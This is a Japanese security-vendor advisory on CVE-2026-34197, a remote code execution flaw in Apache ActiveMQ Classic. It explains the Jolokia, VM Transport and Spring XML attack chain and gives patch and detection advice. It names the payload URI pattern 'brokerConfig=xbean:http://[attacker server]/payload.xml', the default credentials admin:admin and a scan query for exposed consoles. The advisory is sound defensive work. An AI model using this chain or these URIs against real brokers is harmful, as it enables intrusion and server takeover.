2026年4月、Apache ActiveMQ Classicにおいて13年間発見されていなかったリモートコード実行(RCE)脆弱性CVE-2026-34197が公開されました。CVSS v3.1基準で8.8(High)と評価されており、本脆弱性はJolokia管理API、VM Transport、Spring XML初期化メカニズムが組み合わさるポイントで発生する複合的な欠陥です。個別コンポーネントのみを対象とした従来の分析手法では把握が難しい構造となっています。さらに、特定のバージョンでは既知のCVE-2024-32114と組み合わせることで、認証なしで即時に悪用される可能性があります。
興味深い点として、この脆弱性がAIモデル(Claude)によって最初に発見されたことが挙げられます。セキュリティ研究者であるNaveen Sunkavally(Horizon3)は、「いくつかの基本的なプロンプトだけで」脆弱性の経路を特定できたと述べており、AIがセキュリティ研究の手法に与える変化を示す事例として注目されています。本記事では、CVE-2026-34197の技術的な原因と攻撃チェーンを分析し、インターネットに公開されたActiveMQ資産がどのように攻撃対象領域となるのかを考察します。
Apache ActiveMQ RCE脆弱性の概要
| 項目 | 内容 |
|---|---|
| 脆弱性ID | CVE-2026-34197 |
| 影響製品 | Apache ActiveMQ Classic |
| 脆弱性タイプ | 不適切な入力検証/コードインジェクション |
| CVSS スコア | 8.8 |
| 影響バージョン | 5.19.4未満、6.0.0以上6.2.3未満 |
| 修正バージョン | 5.19.4, 6.2.3 以上 |
| 追加リスク条件 | ActiveMQ 6.0.0〜6.1.1においてCVE-2024-32114と組み合わせた場合、Jolokiaの無認証露出が発生する可能性 |
Apache ActiveMQはJavaで開発されたオープンソースのメッセージブローカーであり、非同期通信処理のためのメッセージキューおよびトピック機能を提供します。ActiveMQ Classicはエンタープライズシステム、Webバックエンド、政府機関など、Javaベースの既存インフラにおいて現在も広く利用されています。このような広範な導入状況が、本脆弱性の影響範囲をさらに拡大させる要因となっています。
技術的な原因:3つの機能が組み合わさることで生じるリスク
CVE-2026-34197は単一のコード欠陥ではなく、それぞれは正常に動作する3つの機能が連携したときに初めて攻撃経路が成立する複合的な脆弱性です。Horizon3のSunkavallyはこれについて、「各機能は単独では設計通りに動作するが、組み合わせることでリスクが生じる」と説明しています。
第1段階:Jolokia APIの過剰な権限
2023年のCVE-2022-41678の修正以降、ActiveMQ開発チームはJolokia管理APIを基本的に読み取り専用へ制限しました。しかし、Webコンソール機能を維持するため、ActiveMQ独自のMBeanに対してはすべての操作を許可する例外フラグが追加されました。この例外には、ブローカー間接続を動的に追加するaddNetworkConnector操作も含まれていました。
第2段階:VM Transportによるリモート設定の読み込み
VM Transportは、アプリケーション内にブローカーを組み込むための機能であり、同一JVM内でクライアントとブローカーが直接通信できるよう設計されています。攻撃者が vm:// URIを通じて存在しないブローカーを参照すると、ActiveMQは新たなブローカーインスタンスを生成し、brokerConfigパラメータで指定されたURLから設定を読み込みます。
第3段階:Spring XML初期化時の任意コード実行
攻撃者が brokerConfig=xbean:http:// の形式でリモートのSpring XMLファイルのURLを指定すると、ブローカーはそのファイルを取得し、初期化過程で定義されたすべてのBeanをインスタンス化します。この処理の中で、攻撃者が仕込んだ任意のOSコマンドがサーバー権限で実行されます。
想定される攻撃シナリオ
本脆弱性の公開以降、想定される攻撃の流れは以下のような段階で進行します。まず外部に公開されたActiveMQインスタンスの特定段階では、攻撃者はCriminal IPのようなインターネットスキャンツールを利用し、61616や8161ポートが公開されているActiveMQインスタンスを探索します。バージョン情報はHTTPレスポンスヘッダーや管理UIから容易に確認できます。
認証処理の段階では、対象が6.0.0〜6.1.1のバージョンである場合、CVE-2024-32114を利用してJolokia APIへ認証なしでアクセスします。それ以外のバージョンでは、デフォルトの認証情報(admin:admin)や窃取されたアカウント情報が使用される可能性があります。
コード実行の段階では、攻撃者はJolokia APIのaddNetworkConnector操作を呼び出し、brokerConfig=xbean:http://[攻撃者サーバー]/payload.xml の形式で細工されたURIを挿入します。ブローカーはリモートのSpring XMLを取得し、初期化処理の中で任意のコマンドを実行します。持続性の確保段階では、サーバー権限を取得した攻撃者がWebシェルの設置、内部ネットワークのスキャン、認証情報の窃取など、追加の攻撃を展開します。
ActiveMQはこれまでにも、CVE-2016-3088(認証済みRCE)やCVE-2023-46604(未認証RCE)がCISA KEVに登録されているように、実際の攻撃対象として繰り返し利用されてきました。ランサムウェアグループや国家支援型アクターの双方が継続的に標的としており、CVE-2026-34197についても同様のパターンで迅速に悪用される可能性があります。
Criminal IPで観測された外部公開ActiveMQ資産
本件で重要なのは、ブローカーポートそのものよりも管理インターフェースの露出です。CVE-2026-34197はJolokia管理APIを通じて悪用されるため、Criminal IPではWebレスポンス情報をもとにActiveMQ関連資産を識別する目的で、以下の条件で検知を行いました。
Criminal IP 検索クエリ: title: Apache ActiveMQ
このクエリは、Webページのtitle情報にApache ActiveMQの識別子が含まれる資産を検出するためのものであり、外部からアクセス可能なActiveMQのWebコンソールや管理インターフェースを特定することを目的としています。検出の結果、約200件の資産が確認され、そのうち一部ではActiveMQの管理Webインターフェースが外部から直接アクセス可能な状態で公開されていることが確認されました。これらの資産は単なる露出にとどまらず、Jolokia APIもあわせて公開されている管理ポイントである可能性があり、攻撃者にとって優先的に特定される対象となります。
特にCVE-2026-34197のように、管理機能を通じてリモート設定を読み込み、コード実行へとつながる脆弱性が存在する場合、このような管理インターフェースの露出は情報公開の問題にとどまらず、直接的な攻撃対象領域につながるリスクがあります。
また、一部の環境では管理ポートに加えて、SSH(22)やHTTPS(443)などが同時に公開されているケースも確認されています。これは単一のサービスではなく、実際に運用中のメッセージブローカー環境が外部に露出している可能性を示しています。
このような構成では、管理インターフェースへのアクセス後に追加の設定変更や内部メッセージフローの操作、あるいは他の脆弱性と組み合わせた攻撃へと発展する可能性があります。そのため、攻撃の難易度だけでなく影響範囲も拡大する傾向があります。
対応策および推奨事項
基本対策
最初に実施すべき対応は、ActiveMQ Classicを5.19.4または6.2.3以上へアップデートすることです。ApacheおよびNVDのいずれもこれを公式に推奨しています。
次に、Jolokiaおよび管理Webの公開状況を確認する必要があります。
- ActiveMQ Classicを最新バージョンへアップデート
- ActiveMQ 6.0.0〜6.1.1を利用している場合、/api/* の認証設定を再確認
- Jolokia /api/jolokia の外部公開有無を確認
- デフォルトアカウントおよび弱い管理者認証情報の変更
- ブローカーログにおける vm:// および brokerConfig=xbean:http:// の痕跡を確認
- ブローカープロセスの不審な外向きHTTP通信および子プロセス生成の有無を点検
- 管理Web(8161)およびブローカーポート(61616)への外部アクセスを最小化
脆弱性対応を超えた攻撃対象領域の可視化
今回のApache ActiveMQ RCE脆弱性であるCVE-2026-34197は、単なるパッチ適用にとどまらず、攻撃対象領域管理(ASM)の観点での対応が必要であることを改めて示しています。
ActiveMQは内部システム連携のためのミドルウェアとして導入されることが多いですが、運用過程において管理コンソール(8161)やブローカーポート(61616)が意図せず外部に公開されるケースも少なくありません。組織内で稼働しているActiveMQインスタンスを正確に把握できていない場合、どの資産が即時の攻撃リスクにさらされているのかを判断することは困難です。特にCVE-2024-32114と組み合わせ可能なバージョンが外部に公開されている場合、攻撃者にとっては認証なしでアクセス可能な高価値ターゲットとなります。
単に脆弱性の有無を確認して対応するだけでなく、Criminal IP ASMのような攻撃対象領域管理ツールを活用し、組織の外部攻撃対象領域を継続的に監視することが重要です。ActiveMQを含む内部サービスの外部公開状況やバージョン情報をあわせて分析することで、実際の攻撃可能性に基づいた優先順位付けが可能になります。
FAQ
Q1. CVE-2026-34197は認証が必要な脆弱性なのに、なぜCriticalレベルとして扱うべきですか。
CVE-2026-34197は基本的にJolokiaの認証が必要ですが、ActiveMQ 6.0.0〜6.1.1のバージョンではCVE-2024-32114と組み合わせることで認証が完全に回避されます。また、デフォルトの認証情報が変更されていない環境では、実質的に認証の障壁が存在しない状態になります。さらに、ActiveMQが実際の攻撃グループに繰り返し狙われてきた経緯を踏まえると、認証前提という条件は実際の攻撃シナリオにおいて大きな制約にはならないといえます。
Q2. なぜ13年間発見されなかったのですか。
本脆弱性は単一コンポーネントの欠陥ではなく、Jolokia APIの権限例外、VM Transportによるリモート設定の読み込み、Spring XML初期化処理という3つの機能が組み合わさることで成立します。各機能を個別に分析する従来の手法では、このようなコンポーネント間の連携による攻撃経路を特定することが困難でした。AIによる分析で発見された背景には、前提条件にとらわれず複数コンポーネントの相互作用を同時に追跡できた点があると考えられます。
結論
CVE-2026-34197は、ActiveMQ Classicの単一機能に起因するものではなく、Jolokia、MBean操作、VM Transport、リモート設定の読み込みが組み合わさることで成立する管理インターフェース起点のRCEです。特に一部の6.x環境では、他の脆弱性と組み合わせることで未認証攻撃へと発展する可能性があり、リスクはさらに高まります。そのため、本件の対応は単なるパッチ適用にとどまりません。組織としては、ActiveMQのバージョンアップに加え、Jolokiaの公開状況、8161管理ポートへの外部アクセス、デフォルト認証情報の使用有無、不審なログの痕跡まであわせて確認する必要があります。Criminal IPのようなツールを活用することで、外部に公開された資産や管理インターフェースの露出状況を迅速に把握できます。
なお、関連して CVE-2026-3502:TrueConfアップデートチェーンを悪用したサプライチェーン攻撃分析 の記事もご参考いただけます。
Criminal IP(criminalip.io/ja/register) に登録すると、すぐに脆弱資産の検知を開始できます。さらに、下記ボタンからデモをご依頼いただくことで、エンタープライズ環境において外部に露出した資産を対象としたCriminal IP の脅威インテリジェンス(TI)分析を直接ご確認いただけます。
本レポートは、サイバー脅威インテリジェンス検索エンジン Criminal IP のデータを基に作成されています。
今すぐCriminal IP の無料アカウントを作成すれば、本レポートで引用された検索結果を直接確認したり、さらに膨大な脅威インテリジェンスを自由に検索することができます。
データソース: Criminal IP(https://www.criminalip.io/ja), BLEEPINGCOMPUTER (https://www.bleepingcomputer.com/news/security/13-year-old-bug-in-activemq-lets-hackers-remotely-execute-commands/), SECURITYWEEK (https://www.securityweek.com/rce-bug-lurked-in-apache-activemq-classic-for-13-years/), gbhackers (https://gbhackers.com/claude-identifies-critical-13-year-old-rce-vulnerability-in-apache-activemq/)
